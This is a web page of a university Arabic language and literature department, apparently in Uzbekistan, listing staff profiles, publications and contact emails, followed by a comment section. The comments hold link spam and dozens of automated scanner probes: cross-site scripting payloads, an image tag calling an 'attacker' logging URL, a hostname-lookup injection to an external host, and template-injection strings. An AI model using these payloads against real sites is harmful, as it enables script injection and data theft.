Области научных исследований: вопросы обучения и воспитания, эффективное использование интерактивных методов на уроках русского языка, педагогика

Знание иностранных языков: русский и английский языки

Основные научные труды:

-Таълимни инсонпарварлаштиришда ўқитиш тамойиллари ва методларининг ўзаро алоқадорлиги. Ўқув қўлланма. –Тошкент, ЎзР ФА «Фан» нашриёти, 2006.

-Ижтимоий-гуманитар фанларни ўқитишда замонавий технологиялардан фойдаланиш. Услубий қўлланма. –Тошкент, ЎзР ФА «Фан» нашриёти, 2007.

-Методические указания по педагогической практике для студентов 3-4 курсов университета. Учебно-методическое пособие. –Карши, 2012.

-Педагогические термины и понятия. Терминологический словарь. Карши, 2014. -135 стр.

-Русский язык. Учебное пособие. Международная исламская академия Узбекистана. Ташкент, 2020. С.110

-Академический русский язык. Учебник. Международная исламская академия Узбекистана. Ташкент, 2022. С.250

-Русский язык по специальности. Учебное пособие. Международная исламская академия Узбекистана, Ташкент, 2023. С.154

-Effective teaching methods in teaching English. Журнал Métodos de enseñanza efectivos en la enseñanza del inglés. RELIGACIÓN Revista de Ciencias Sociales y Humanidades. Vol 4 • Nº 19 • Quito • Trimestral • Septiembre 2019. С.770-772

-Воспитание самостоятельности студентов в условиях внедрения модульной системы образования. MONOGRAFIA POKONFERENCYJNA. SCIENCE, RESEARCH, DEVELOPMENT #22. PHILOLOGY, SOCIOLOGY AND CULTUROLOGY. London, 2019, 30-31 октябрь, С.53-56

-Преимущества и проблемы дистанционного обучения в Узбекистане. //

Ж. Наука и образование сегодня. Москва, 2022, №5 (74). С.4-9

-Вопросы компетенции и креативности педагога в образовательном процессе. // Ж. Педагогик маҳорат. Бухоро, 2023, №4. Б. 102-107

Ссылка на научные работы: -----

Адрес электронной почты: djumayevanargiz2013@mail.ru

Рабочий телефон: +998 91 211 54 00 (моб.)


 

Hozirgi kunda kafedrada asosiy shtatda fan nomzodlari, dotsentlar, fil.,f.n. (Phd), katta o‘qituvchi, o‘qituvchilar faoliyat yuritmoqda.

KAFEDRA TOMONIDAN TAYYORLANAYOTGAN MUTAXASSISLIK:

5120100 – “Filologiya va tillarni o‘qitish” (arab tili) bo‘yicha bakalavr tayyorlanmoqda.

KAFEDRANING O‘QUV ISHLARI BO‘YICHA FAOLIYATI:  

Kafedra tomonidan darslar to‘liq zamonaviy pedagogik va axborot texnologiyalaridan foydalangan holda, klassik hamda zamonaviy uslublar uyg‘unligida olib borilmoqda. Ayni vaqtda kafedrada:

5120100 – “Filologiya va tillarni o‘qitish” (arab tili) ta’lim yo‘nalishi bo‘yicha bakalavr bosqichi talabalariga:

 • 3 nomdagi Umumkasbiy fanlaridan;
 • 11 nomdagi ixtisoslik fanlaridan;
 • 4 nomdagi qo‘shimcha fanlaridan ma’ruzalar va amaliy mashg‘ulotlar bo‘yicha darslar olib borilmoqda.
 • Shuningdek, O‘zXIAda tahsil olayotgan 9 ta nofilologik ta’lim yo‘nalishlarida “Arab tili”, “Asosiy chet tili (arab)”, “Ikkinchi chet tili (arab)”, “Sharq tillari (arab)” kabi fanlardan amaliy mashg‘ulotlar olib borilmoqda.

Kafedra professor-o‘qituvchilari  tomonidan muntazam ravishda Xalqaro va Respublikamizda o‘tkazilayotgan ilmiy amaliy anjumanlarda faol ishtirok etishmoqda.

2018-2019-o‘quv yili davomida kafedra a’zolari tomonidan 2 ta o‘quv qo‘llanma, 15 ta OAK tasarrufidagi jurnallarda , 4 ta Xorijiy ilmiy jurnallarda, 11 ta xorijiy konferensiyalarda, 38 ta Respublika konferensiyalarida tezis va ilmiy maqolalar chop etildi.

KAFEDRA TALABALARINING MUTAXASSISLIK BO‘YICHA BILIMINI YANADA OSHIRISH MAQSADIDA TASHKIL ETILGAN TO‘GARAKLAR:

Yosh tarjimonlar klubi;

Audio materiallar bilan ishlash;

Qiziqarli arab tili;

Arab tili olami;

Davayte uluchshem nash arabskiy;

Arab tili jadvallarda;

Klassik matnlar bilan ishlash;

Arab tilida imlo;

Tarjima amaliyoti;

Arab nahvi;

Valonter tarjimonlarni tayyorlash;

Keling arabcha gaplashamiz.

Kafedra professor-o‘qituvchilari mutaxassisliklari bo‘yicha muntazam ravishda o‘z malakalarini respublikamiz va xorijda oshirib kelmoqdalar.

Kafedra professor-o‘qituvchilarining 6 nafari “Filologiya va tillarni o‘qitish”, “Islomshunoslik”, “Jahon iqtisodiyoti va xalqaro iqtisodiy munosabatlar”, “Dinshunoslik ” bakalavriat ta’lim yo‘nalishlari guruhlariga murabbiylik qilib kelmoqdalar.

“ARAB TILI VA ADABIYOTI AL-AZHAR” KAFEDRASI INNOVATSION HAMKORLIK BO‘YICHA QUYIDAGI TASHKILOTLAR BILAN ALOQALAR O‘RNATGAN:

— O‘zbekiston Respublikasi Fanlar Akademiyasining Alisher Navoiy nomidagi Davlat Adabiyot muzeyi

— ToshDSHI qoshidagi Olmazor akademik litseyi;

— O‘zXIA akademik litseyi.

KAFEDRANING XALQARO ALOQALARI

Kafedraga Misr Arab Respublikasi “Qohira universiteti” dan Ubayd Muhammad Abdujavvad jalb qilingan bo‘lib, talabalarga arab tilidan ta’lim berib kelmoqda. 2019-yil 24-noyabr kuni katta o‘qituvchi Ubayd Muhammad tomonidan mahorat darsi o‘tkazildi. 2019-yil 5,8,9-yanvar kunlari Doktor Ubayd Muhammad tomonidan tashkil etilgan “Tovush va harflar o‘qitish uslubi”, “Arab tilida gaplashmaydiganlar uchun so‘zlarni tushuntirish uslublari”, “Arab tilida gaplashmaydiganlar uchun gap tuzish uslublari” kabi metodik seminarlar o‘tkazildi.

Kafedra mudiri

FISH: Kazakbayev Akbar Akmaldjanovich

Ilmiy darajasi:-

Ilmiy unvoni:-

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus, ingliz tillari

Asosiy ilmiy ishlari: Xorijiy tillarni  zamonaviy ped-texnologiyalarda o‘qitishning  ahamiyati// Sharq tillarini o‘qitishda differensial yondashuv va zamonaviy uslublar» mavzuidagi respublika ilmiy-amaliy konferensiyani ilmiy maqolalar to‘plami 2016 yil 14-15 dekabr. Toshkent 2016y. B.80-82
Oilada yoshlar tarbiyasida ma’naviy qadriyatlar roli// Milliy va ma’naviy qadriyatlarning yuksalishida ayollarning o‘rni, to‘plam.2016-yil 20-aprel. Toshkent 2016y. B.70-71
Yoshlar ma’naviyatini barqarorlashtirishda oilaning o‘rni// Oilani mustahkamlashda ilmiy tadqiqotlar ko‘lamining ahamiyati. Respublika ilmiy amaliy anjuman materiallari. 2018-yil 24-noyabr. Jizzax 2018. B132-133
Diniy-ekstremistik oqimga moyil fuqarolar bilan ishlashning o‘ziga xos jihatlari (uslubiy qo‘llanma)// Toshkent. Toshkent islom universiteti nashriyoti – matbaa birlashmasi, 2017y.-32b.

kazakbayevakbar@iiua.uz

Professor-o‘qituvchilar haqida ma’lumot


FISH: Aripova Zuhra Djaxangirovna

Ilmiy darajasi: t.f.n

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari: Islom tarixi va manbashunosligi, filologiya, arab tili va adabiyoti

Chet tillarni bilishi: arab, ingliz (lug‘at yordamida), rus tillari

Asosiy ilmiy ishlari: 50dan ortiq ilmiy ishlar, jumladan: 1.Arab tilidan boshlang‘ich kurslar uchun fonetik diktant to‘plami – T.: “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2011. – 40b.; Arab tilidan klassik matnlar. O‘quv-uslubiy qo‘llanma – T. : “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2011. – 64 b.; “Informatika va axborot texnologiyalari” yo‘nalishi talabalariga arab tilidan o‘quv-uslubiy qo‘llanma. – T. : “Toshkent islom universiteti” nashriyot-matbaa birlashmasi, 2012. – 72 b.; .Psixologiya yo‘nalishi talabalariga arab tilini o‘qitish bo‘yicha o‘quv qo‘llanma. Toshkent: TIU nashriyot-matbaa birlashmasi. 2015; Sharq tillari (arab) o‘quv qo‘llanma. “Tafakkur bo‘stoni”, 2018 yil, Toshkent.-256b.

El. manzil: aripova@iiau.uz

FISH: Аbdullayev Abdulhay Baltabayevich

Ilmiy darajasi: t.f.n

Ilmiy unvoni: dotsent

Ilmiy tadqiqot yo‘nalishlari: Islom tarixi va manbashunosligi, filologiya, arab tili va adabiyoti              

Chet tillarni bilishi: arab, rus, ingliz tillari

Asosiy ilmiy ishlari: 50 dan ortiq, jumladan: Программа по курсу. «Литературный арабский язык» Тоshkent. 1988 y..20 bet, Общенаучные тексты на арабском языке». Тоshkent. 1990 y. 72 bet;.Аrab tili programmasi» (qisqa muddatli kurslar tinglovchilari uchun). Тоshkent.1991 y. 18 bet.;«Islom ensiklopediyasi» А-H. Тоshkent. «O‘zbekiston Milliy ensiklopediyasi» Davlat ilmiy nashriyoti, 2003 y. 125-145 betlar; «Buyuk allomalarimiz» (arab tilida). Тоshkent. Тоshkent islom universiteti nashriyoti-matbaa birlashmasi, 2005 y. 80 bet; «2007-yil-Тoshkent islom madaniyati poytaxti» (arab tilida). Тоshkent. Тоshkent islom universiteti nashriyot-matbaa birlashmasi, 2008 y. 90 bet; O‘zbek milliy taomlari (arab tilida). “Тоshkent islom universiteti” nashriyot-matbaa birlashmasi. -Тоshkent, 2008. 76 bet; Аrab tilining Misr lahjasi. Тоshkent islom universiteti” nashriyot-matbaa birlashmasi Тоshkent, 98 bet.; Мa'naviyat lug‘ati. Тоshkent. Ма'naviyat. 2012. 400 bet 
El. manzil: abdullayevabdulhay@iiau.uz

FISH: Shokirova Zulfiya Normaxammatovna

Ilmiy darajasi: t.f.n

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: Islom tarixi va manbashunosligi, filologiya, arab tili va adabiyoti

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: 50 dan ortiq, jumladan,

1.O‘zbekistonning ma’navit strategiyasi: genezisi, evolyutsiyasi va amaliyoti. O‘zDJTU (Respublika ilmiy‑amaliy anjumani), 2016.

Arab tilida “So‘roq gaplar” mavzuini mustahkamlashda turli pedtexnologiyalardan foydalanish. Sharq tillarini o‘qitishda differensial yondashuv va zamonaviy uslublar. – T.:TIU, 2016.

2.Muhammad s.a.v.ning qiz farzand tarbyasidagi ibratlari. Xotin‑qizlarning fan, ta’lim, madaniyat va biznes sohasidagi yutuqlari mavzusidagi Xalqaro konferensiya. Jizzax: JPI., 2017.

3.Al‑Azhar universitetida ma’naviy‑ma’rifiy ishlarning tashkil etilishi. Dinshunoslikning dolzarb muammolari mavzuidagi Respublika ilmiy‑amaliy konferensiyasi. – T.:TIU, 2018.

4.Faxruddin ar‑Roziyning “Balog‘at ilmiga” oid ba’zi qarashlari

“Sharq mash’ali” ToshDSHI. 2018/4 va boshq.

shokirovazulfiya@iiau.uz

FISH: Ismoilova Yulduz Anvarovna

Ilmiy darajasi: t.f.n

Ilmiy unvoni:-

Ilmiy tadqiqot yo‘nalishlari: Tilshunoslik, manbashunoslik, tarixiy tadqiqodlar

Chet tillarni bilishi: arab, rus, ingliz tillari

Asosiy ilmiy ishlari: 30 dan ortiq ilmiy maqolalar va o‘quv qo‘llanmalar muallifi. Bir qancha ilmiy va ilmiy-amaliy konferensiyalar ishtirokchisi.

 1. Hozirgi Sharq mamlakatlarining ijtimoiy-siyosiy va madaniy rivojlanishi tarixi.//Ilmiy to‘plam. – Toshkent, 2016. - V. 3 – 6.
 2. Fransiya migrasiya siyosati tarixiga doir. //”XXI asrda jahon siyosati va O‘zbekiston tajribasining siyosiy, huquqiy va ijtimoiy jihatlari” mavzusidagi respublika ilmiy-amaliy anjumanining materiallari. –Toshkent, 2017. - V. 245 – 249.
 3. Из опыта преподавания арабского языка в группах исторического направления// ”Хorijiy Sharq mamlakatlari tarixiy jarayonlari va ularni o‘rganishning dolzabr muammolari” mavzusidagi respublika ilmiy-uslubiy anjumanining materiallari. –Тоshkent, 2017. - В. 109– 114.
 4. Некоторые аспекты обучения профессонально-ориентированному чтению на арабском языке в группах нефилологического  направления// Respublika ilmiy-uslubiy anjumanining materiallari. – Тoshkent, 2018. – B.
 5. К вопросу обучения профессионально-ориентированному чтению на арабском языке в группах нефилологического направления// O‘zbekiston Respublikasi DXX institutida xorijiy tillarni o‘qitish metodikasi va amaliyoti// Ilmiy-amaliy konferensiya materiallari to‘plami. 2018-yil 30-may. – Тоshkent: O‘zRes DXX instituti 2018 va boshqalar.

ulduz22206@yahoo.com

 

FISH: Ibragimov Bahtiyor

Ilmiy darajasi: -

Ilmiy unvoni:-

Ilmiy tadqiqot yo‘nalishlari: Islom tarixi va manbashunosligi, filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: 100 dan ortiq, jumladan: .

1.«Arab tilidan ilk saboqlar» , «Toshkent davlat universiteti», - T., 1995.

« O‘zbekcha-arabcha so‘zlashgich», (8,2 b.t.) «O‘qituvchi», - T., 1995
«Arab tili» darsligi, 2-sinf uchun, (14,5 b.t.) «O‘qituvchi», - T., 1996.
«O‘zbekcha-arabcha lug‘at», (18 b. t ) «O‘zbekiston milliy ensiklopediyasi», - T., 1999
«Arab tili» darsligi, to‘ldirilgan 2-nashr, (15 b.t.). »Toshkent islom universiteti» nashriyot- matbaa birlashmasi», 2008.
«100 dan ortiq mavzuda arabcha so‘zlashuv va haj kitobi», (9,5 b.t.) «Nihol», - T., 2009.
O‘zbekiston – O‘mon sultonligi: hamfikrlik, hamjihatlik, hamkorlik. JIXIM yo‘nalishi talabalari uchun o‘quv qo‘llanma, 6 b.t. T.: Toshkent islom universiteti. 2010.
Arab tili. Uni yaxshi o‘rganmoqchi bo‘lsangiz. “Toshkent islom universiteti” nashriyot-matbaa birlashmasi. 2011.

ibragimovbaxtiyor@iiau.uz

FISH: Mullasodiqova Nigora Miromonovna

Ilmiy darajasi: -

Ilmiy unvoni:-

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: 30 dan ortiq, jumladan:

 1. “Naxvda yuzta omil” . Qo‘llanma. ТIU. 2014 y.
 2. А.Аbdujabborov darsligini nashrga qayta tayyorlash . O‘quv-uslubiy qo‘llanma. - Т.: Тоshkent islom universiteti, 2015.
 3. Аmaliy dars jarayonida muammoli vaziyatlardan foydalanish. / Amaliy dars jarayonida muammoli vaziyatlardan foydalanish. Sharq tillarini o‘qitishda differensial yondashuv va zamonaviy uslublar.ТIU. 2016.
 4. Рекомендации по самостоятельному изучению арабского языка. / Материалы VIIIреспубликанской научно-практической конференции посвещенной 100 летию Туркестанского Мухтариата и Алашординской автономии “Узбекали Жанибекские чтения -2017”. Туркистан. 3 наурыз 2017.
 5. Arab tilini o‘qitishda samarali natijalar beradigan ilg‘or uslublari. / “Chet tillarini o‘qitish istiqbollari” Respublika ilmiy-amaliy konferensiyasi. DXX Instituti. Т. 2018.
 6. “Yoshlarda sog‘lom ruhiyat shakllanishida oilaviy muhitning o‘rni” / “Oilani mustahkamlashda ilmiy tadqiqotlarning ahamiyati” mavzusidagi Respublika ilmiy-amaliy anjiman materiallari. Jizzax. 2018 va boshqalar.

mullasodiqovanigora@iiau.uz

FISH: Doktor Ubayd Muhammad Abdulhalim Abduljavvad

Ilmiy darajasi:PhD

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: filologiya,  arab bo‘lmaganlarga arab tilini o‘rgatish bo‘yicha mutaxassis

Chet tillarni bilishi: rus, ingliz tillari

Asosiy ilmiy ishlari: O‘zbek muallimlariga arab tilini ikkinchi til sifatida o‘qitish metodlari bo‘yicha seminar-trening.

 1. O‘zbekcha-arabcha lug‘at kitobini tahrir qilishda hamkorlik.
 2. Toshkentdagi Misr madaniyat markazi faoliyatida hamkorlik.
 3. “Arab bo‘lmaganlarga arab tilini o‘qitish” kitobini nashr etishdagi hamkorlik.

doktorubayd@iiua.uz

FISH: Pirmuxammedov Baxodir Baxromovich

Ilmiy darajasi: -

Ilmiy unvoni:-

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: 

1.“Rabiy’ul-abror” asari islomshunoslik manbai sifatida. TIU ilmiy tahliliy axboroti. – Toshkent, 2002. – № 1 B.47-50

2. Maxmud az-Zamaxshariyning “Rabiy’ul abror” asari va uning qo‘lyozma nusxalari// Imom al-Buxoriy saboqlari, 1/2002. B.71-72

3.Axloq ilmi va Mahmud az-Zamaxshariyning uning rivojiga qo‘shgan hissasi// TIU ilmiy tahliliy axboroti.

– Toshkent, 2004. – № 1. B.31-34

Mahmud az-Zamaxshariyning “Rabiy’ul-abror”asarida xadislarning qo‘llanilishi.// Sharqshunoslik.

– Toshkent, ToshDSHI,  2006. B.118-120

5. Biz bilgan va bilmagan ehromlar//“Nil farzandlari” misr madaniyat markazi jurnali №8, 2010. B.84-85

6.Xorijiy adabiyotlar orqali sharq tillarida ta’lim berish//«Sharq tillarini o‘qitishda differensial yondashuv va zamonaviy uslublar» mavzuidagi respublika ilmiy- amaliy konferensiyani ilmiy maqolalar to‘plami 2016-yil 14-15-dekabr. Toshkent2016 Toshkent: TIU. B.91-95

7.” جمهورية أوزبكستان وسلطنة عمان نقاط التوافق و آفاق التعاون” 2018 yil 26-aprel kuni DXX Institutida “O‘zbekiston va arab dunyosi: hamkorlikning holati va istiqbollari” mavzusidagi ilmiy-amaliy konferensiyasi materiallari to‘plami. B.36 va boshq.

pirmuhammedovbahodir@iiau.uz

FISH: Do‘smatov Sanjar Toshpulatovich

Ilmiy darajasi:-

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: 10 dan ortiq, jumladan:

 1. Zamaxshariyning “Maqomot” asari ma’naviyat tarixiga oid nodir manba. O‘zbekiston Milliy universiteti. Ilmiy-amaliy konferensiya materiallari // T.: 2003 yil – B.74-76
 2. “Maqomot” asarida Zamaxshariyning axloqiy qarashlari. Toshkent islom universiteti ilmiy-tahliliy axboroti // T.: «Toshkent islom universiteti» nashriyoti. 2005  yil № 3. – B.27-29
 3. “Maqomot” asarining qo‘lyozma va bosma nusxalari // Sharq mash’ali. T.: «Toshkent sharqshunoslik instituti» nashriyot-matbaa birlashmasi. 2005 yil 1-son. B.18-19.
 4. “Maqoma” janri genezisi masalasi // Imom Buxoriy saboqlari. 2005 yil 4-son. B.194-196.
 5. Роль и место “Макамат аз-Замахшари” в истории арабоязычной литературы Мавераннахра // Махмуд Замахшари и научно-литературьное возрождение востока. Материалы Международной научной конференции. Ашгабад. 2007-yil. Б. 594-596
 6. “Maqomot” arab nasrining nodir manbasi sifatida // O‘zbekiston Milliy universiteti. Ilmiy-amaliy konferensiya materiallari. T.: 2003 yil – B.82-86
 7. Mahmud Zamaxshariy va mu’tazila oqimi Toshkent islom universiteti ilmiy-tahliliy axboroti // T.: «Toshkent islom universiteti» nashriyoti. 2009 yil № 3. – B.25-28 va boshqa.

do’smatovsanjar@iiau.uz

FISH: Baxromjon Zakirdjanovich Daminov

Ilmiy darajasi: -

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: jumladan: Yoshlar ma’naviyatini shakllantirishda onalarning tarbiyaviy vazifasi// Milliy va ma’naviy qadryatlarning yuksalishida ayollarning o‘rni konferensiya to‘plami, 2019. B.138
Maxmud Zamaxshariyning ijtimoiy-falsafiy va ilmiy merosi// “Mahmud Zamaxshariy merosi va uning fan tarixi rivojidagi o‘rni” mavzusidagi ilmiy anjuman, TDSHI, 2019. B. 68.

daminovbahrom@iiau.uz

ФИШ: Исамутдинов Азизбек Батирович

Илмий даражаси:-

Илмий унвони:-

Илмий тадқиқот йўналишлари: филология, араб тили ва адабиёти.

Чет тилларни билиши: араб, рус тиллари

Асосий илмий ишлари:  5 дан ортиқ, жумладан:

 1. “Ибн Ақийл ва унинг Ибн Моликнинг “Алфиййа” асарига шарҳи”. Шарқшунослик журнали 2010 йил 1-сон.
 2. “Араб тилида “мафъул биҳи” ва уни ўзбек тилига таржима қилиш масаласи”, Шарқшунослик журнали 2012 йил 1-сон.
 3. “Мафъул биҳи (тўлдирувчи) ва унинг омиллари изофа бирикмасида”, Шарқшунослик анжумани тўпламининг 5-сонида.
 4. “Мафъуллар рус ва ўзбек тилшунослари талқинида”, “Ёш олимлар анжумани” илмий мақолалар тўпламида 2012 йил.
 5. “Араб тилида мафъул маъаҳу”, Академик Убайдулла каримов номидаги 9-илмий-амалий конференция тезислар тўплами ва бошқ.

isamutdinovaziz@iiau.uz

ФИШ: Бахромхўжа Хасанходжаевич Махамадходжаев

Илмий унвони:-

Илмий тадқиқот йўналишлари: филология, араб тили ва адабиёти.

Чет тилларни билиши: араб, рус, инглиз тиллари

 

  

FISH: Nuriddinov Xojiakbar Djalalitdinovich

Ilmiy darajasi: -

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti.

Chet tillarni bilishi: arab, rus tillari

Asosiy ilmiy ishlari: 5 dan ortiq, jumladan:

1.Tarjima va pragmatikaning ayrim masalalari Bosma Samarqand chet tillari instituti.Tarjima va lingvistika Samarqand 2015-yil № 2. B.61-63

2.Globallashuv jarayonida ta’limda sifat o‘zgarishlar Bosma Buxoro biloyati xalq ta’limi xodimlarini qayta tayyorlash va ularni malakasini oshirish instituti Ta’lim tarbiya jarayoniga zamonaviy pedagogik va axborot kommunikatsiya texnologiyalarini samarali joriy etish: muammo va yechimlar Buxoro 2016-yil 2-qism 8-9-yanvar. B.84-86      

3.Informatika yo‘nalish talabalariga ta’lim berishda zamonaviy texnologiyalarini qo‘llash  Bosma Sharq tillarini o‘qitishda differensial yondashuv va zamonaviy uslublar. Respublika ilmiy-amaliy konferensiyasi materiallari to‘plami. T.: «Toshkent islom universiteti» nashriyot-matbaa birlashmasi. 2016-yil 14-15-dekabr B.132-136 va boshq.

FISH: Matibayeva Raziya Baltabayevna

Ilmiy darajasi: t.f.n

Ilmiy unvoni:-

Ilmiy tadqiqot yo‘nalishlari: Islom tarixi va manbashunosligi, filologiya, arab tili va adabiyoti

Chet tillarni bilishi: arab, rus,ingliz tillari

Asosiy ilmiy ishlari: 100 dan ortiq, jumladan:

Effektivnost primeneniya eksplisitnogo podxoda pri obuchenii grammatike arabskogo yazыka. Jahon iqtisodiyëti va diplomatiya universiteti, 2018-yil fevral.
Imom Abu Xanifa ta’limotida ilmga qarashlar. Dinshunoslikning dolzarb muammolari / Respublika ilmiy-amaliy konferensiyasi. TIU, 2018-yil 7 aprel.
Manoqib Abi Xanifa» asarining hanafiylik tarixidagi o‘rni. «Markaziy Osiyo va islom sivilizatsiyasi. Respublika ilmiy-amaliy konferensiyasi. Yosh tadqiqotchi va talabalarning respublika anjumani to‘plami / O‘zbekiston xalqaro islom akademiyasi nashriyot-matbaa birlashmasi, Toshkent, 14-aprel 2018-yil.
Status sovremennoy jenщinы v Uzbekistane. Ayol – ma’naviyat gulshani / Respublika ilmiy-amaliy konferensiyasi. Jizzax politexnika instituti. Jizzax, 2018-yil 18-19 may.
Abu Nasr Forobiyning axloq odob va barkamol inson to‘g‘risidagi fikrlari va ularning bugungi kundagi tarbiyaviy ahamiyati. “Rol semi v duxovno-nravstvennom vospitanii detey i molodeji”. Mejdunarodnaya nauchno-prakticheskaya konferensiya/ O‘zR Vazirlar maxkamasi xuzuridagi “Oila” ilmiy-amaliy tadqiqot markazi, 15-noyabr 2018-yil.
Oila tarbiyasida qadriyatlarning ahamiyati. “Oilani mustahkamlashda ilmiy-tadqiqotlar ko‘lamining ahamiyati” mavzuidagi Respublika ilmiy-amaliy anjuman materiallari/ O‘zbekiston Respublikasi Vazirlar Mahkamasi huzuridagi “Oila” ilmiy-amaliy tadqiqot markazi Jizzax viloyati boshqarmasi, O‘zbekiston Respublikasi Oliy va O‘rta maxsus ta’lim vazirligi, Jizzax politexnika instituti, -J: 2018-yil 24-noyabr va boshqa.

matibayevaroziya@iiau.uz

 

FISH: Shukurov Yorqinjon Alidjanovich

Ilmiy darajasi: -

Ilmiy unvoni: -

Ilmiy tadqiqot yo‘nalishlari: filologiya, arab tili va adabiyoti

Chet tillarni bilishi: arab, rus,ingliz tillari

Asosiy ilmiy ishlari: 10 dan ortiq,  jumladan:

Abul Qosim ash-Shabbiy - yangi davr Tunis shoiri. TDSHI ning “Sharq mash’ali” ilmiy jurnali, 2012 y.,  №1
Akademik liseylar uchun arab tili fanidan o‘quv dasturi. O‘zbekiston Respublikasi Oliy va o‘rta maxsus ta’lim vazirligi Muvofiqlashtiruvchi kengashining 24.07.2012y.dagi №3-son majlis bayonnomasi
Arab tili fanidan uch darajali test topshiriqlari. O‘quv qo‘llanma. TDPU akademik lisey pedagogik kengashi. 2013 y.
Our great ancestors. O‘quv qo‘llanma. “Toshkent islom universiteti” nashriyoti, 2014 y. (hammualliflikda)
Pedagogik texnologiyalarni o‘z o‘rnida qo‘llanilganda samara beradi. Uslubiy maqola. “Kasbiy fanlar metodikasi” jurnali, 2015.
Akademik litsey o‘quvchilari uchun arab tili fanidan o‘quv loyihasi. Sharq tillarini o‘qitishda differensial yondoshuv va zamonaviy uslublar. TIU, 2016
Akademik litseylar uchun arab tili fanidan o‘quv dasturi.  O‘zbekiston Respublikasi Oliy va o‘rta maxsus ta’lim vazirligi Muvofiqlashtiruvchi kengashining 18.08.2018 y.dagi №4-son majlis bayonnomasi
Islom madaniyatida kitob o‘rni va kitobat qilish an’analariga doir. (nashrda) va boshq.

shukurovyorqin@iiau.uz

Izoh qoldirish

Izohlar

24.09.2023 08:41
“Arab tili va adabiyoti Al-Azhar” kafedrasi - IIAU <a href="http://www.g1u7kfn332u6gfq936lx2n435c722kfos.org/">asfgbvnvb</a> sfgbvnvb http://www.g1u7kfn332u6gfq936lx2n435c722kfos.org/ [url=http://www.g1u7kfn332u6gfq936lx2n435c722kfos.org/]usfgbvnvb[/url]
31.08.2023 19:27
“Arab tili va adabiyoti Al-Azhar” kafedrasi - IIAU <a href="http://www.gh7m30ws229qf155x59ye7wocfm5z646s.org/">axfzmpvzix</a> [url=http://www.gh7m30ws229qf155x59ye7wocfm5z646s.org/]uxfzmpvzix[/url] xfzmpvzix http://www.gh7m30ws229qf155x59ye7wocfm5z646s.org/
28.08.2023 13:26
“Arab tili va adabiyoti Al-Azhar” kafedrasi - IIAU sccsbemobd http://www.geg284xcape4f37d921p2tb641vsz353s.org/ <a href="http://www.geg284xcape4f37d921p2tb641vsz353s.org/">asccsbemobd</a> [url=http://www.geg284xcape4f37d921p2tb641vsz353s.org/]usccsbemobd[/url]
22.08.2023 21:36
20<MIfY3K<
22.08.2023 21:36
20<ifRAme sRc=9194.com></IfRamE>
22.08.2023 21:36
20<YJfunP x=9359>
22.08.2023 21:36
20<img sRc='http://attacker-9577/log.php?
22.08.2023 21:36
20}body{acu:Expre/**/SSion(8YNC(9080))}
22.08.2023 21:36
20<% contenteditable onresize=8YNC(9358)>
22.08.2023 21:36
20939RH <ScRiPt >8YNC(9857)</ScRiPt>
22.08.2023 21:36
20<W0D7JE>ILKBC[!+!]</W0D7JE>
22.08.2023 21:36
<a HrEF=jaVaScRiPT:>
22.08.2023 21:36
[url=http://xss.bxss.me][/url]
22.08.2023 21:36
20<img<!-- --> src=x onerror=alert(9026);//><!-- -->
22.08.2023 21:36
20&lt;ScRiPt&gt;8YNC(9968)&lt;/sCripT&gt;
22.08.2023 21:36
20<input autofocus onfocus=8YNC(9421)>
22.08.2023 21:36
<a HrEF=http://xss.bxss.me></a>
22.08.2023 21:36
20<img/src=">" onerror=alert(9143)>
22.08.2023 21:36
%32%30%3C%53%63%52%69%50%74%20%3E%38%59%4E%43%289731%29%3C%2F%73%43%72%69%70%54%3E
22.08.2023 21:36
20\u003CScRiPt\8YNC(9203)\u003C/sCripT\u003E
22.08.2023 21:36
20<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9595'>
22.08.2023 21:36
20<body onload=8YNC(9050)>
22.08.2023 21:36
20<img src=//xss.bxss.me/t/dot.gif onload=8YNC(9630)>
22.08.2023 21:36
20<img src=xyz OnErRor=8YNC(9138)>
22.08.2023 21:36
20<video><source onerror="javascript:8YNC(9557)">
22.08.2023 21:36
20<isindex type=image src=1 onerror=8YNC(9698)>
22.08.2023 21:36
20<ScR<ScRiPt>IpT>8YNC(9017)</sCr<ScRiPt>IpT>
22.08.2023 21:36
comments/.
22.08.2023 21:36
20<ScRiPt >8YNC(9982)</ScRiPt>
22.08.2023 21:36
20<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9975></ScRiPt>
22.08.2023 21:36
20<ScRiPt >8YNC(9515)</ScRiPt>
22.08.2023 21:36
20<ScRiPt >8YNC(9427)</ScRiPt>
22.08.2023 21:36
'"
22.08.2023 21:36
<!--
22.08.2023 21:36
20<WUMOVO>30MHN[!+!]</WUMOVO>
22.08.2023 21:36
20<script>8YNC(9744)</script>
22.08.2023 21:36
comments
22.08.2023 21:36
comments
22.08.2023 21:36
209238936
22.08.2023 21:36
".gethostbyname(lc("hitzk"."dcujrljt0cb34.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(74).chr(97).chr(85)."
22.08.2023 21:36
acu3532<s1﹥s2ʺs3ʹuca3532
22.08.2023 21:36
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
22.08.2023 21:36
/xfs.bxss.me
22.08.2023 21:36
{{50195*50274}}
22.08.2023 21:36
